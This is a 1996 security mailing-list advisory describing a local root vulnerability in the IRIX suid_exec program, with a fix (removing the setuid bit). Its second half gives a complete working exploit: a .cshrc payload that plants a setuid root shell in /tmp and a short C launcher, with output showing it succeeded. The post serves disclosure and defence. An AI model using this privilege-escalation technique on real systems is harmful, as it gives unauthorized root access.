Irix: suid_exec hole
Yuri Volobuev (volobuev@t1.chem.umn.edu)
Mon, 2 Dec 1996 20:25:58 -0600

Howdy,

Yes, one more Irix root vulnerability, and yes, it's another suid program.

ABSTRACT

/sbin/suid_exec is owned by root and suid. I don't know what it's supposed to do, but it can be easily exploited by any local user to get root privileges. The exploit works on both 5.3 and 6.2 machines; it's part of eoe.sw.unix and thus is installed on each and every machine.

FIX:

    chmod -s /sbin/suid_exec

ERRATA

In my previous post, I mentioned that the rfind subsystem is not part of Irix 6.2. Apparently, as Jaechul Choe <poison@cosmos.kaist.ac.kr> mentioned, it's there, though it's not part of the "default" distribution, whatever that is. It has the same bugs the 5.3 version does and is also vulnerable to all posted exploits.

If you are busy, move on to your next message now.

Full Story.

If you think something like "it's getting too boring...", you are right. I'm getting bored, too. It's like beating a dead horse. Unlike the SOD folks, I don't have that much desire; I just hack Irix for fun, and it's no fun anymore, so I think I'll stop, at least for some time. I actually wasn't going to hack suid_exec, either, but the name was just too attractive.

/sbin/suid_exec (/etc/suid_exec is a link to it) is a mysterious program. It's not known to me what it's supposed to do. There is no man page, and I had no clue about what it actually does. Trying to run it will not give one anything except errors. So I got curious. After some playing with system call tracing and strings, I think I found what it does. It checks argv[0] (why?) for ownership and permissions, and if it's executable, it invokes your default shell to parse that file. If it's a root-owned suid program, suid_exec will not give up root privileges prior to execve. So it can serve as an interpreter for suid shell scripts.

Of course, by default all suid executable files on Irix are ELF binaries, and when the shell tries to parse such a file all you get is errors, but...

Interesting point: it gets the shell name from the SHELL environment variable. Besides, it doesn't care what this shell may do, and it may do a lot of interesting things, like executing dot files.

There are many ways to exploit it; to my taste the easiest is

    % setenv | grep SHELL
    SHELL=/bin/tcsh
    % mv ~/.cshrc ~/.cshrc.old
    % cat > ~/.cshrc
    cp /bin/sh /tmp
    chmod a+rsx /tmp/sh
    ^D
    % cat > expl.c
    #include <unistd.h>

    /* Run suid_exec with argv[0] naming a root-owned suid binary: it keeps
       root and hands /bin/su to $SHELL (tcsh here), which reads ~/.cshrc
       before it ever gets to "parsing" su. */
    int main(void)
    {
        execl("/sbin/suid_exec", "/bin/su", "/bin/su", (char *)0);
        return 1;   /* only reached if the exec itself fails */
    }
    ^D
    % cc expl.c -o expl
    % ./expl
    Too many ('s.
    % ls -l /tmp/sh
    -r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh*

(Sorry, non-csh folks, I guess you get the pattern anyway.)

Again, one can get root out of it in a faster way; it's just one of many. I'm really curious: what is this thing doing on the system, anyway? Getting root out of it is seemingly its only use. I just didn't find any reference to it anywhere. So maybe removing the suid bit from it will break something, I don't know. Nothing is in /etc/*/*. I wish some SGI god followed the competitor's good example and explained to us what it does. But guess what the odds of that are.

cheers,
yuri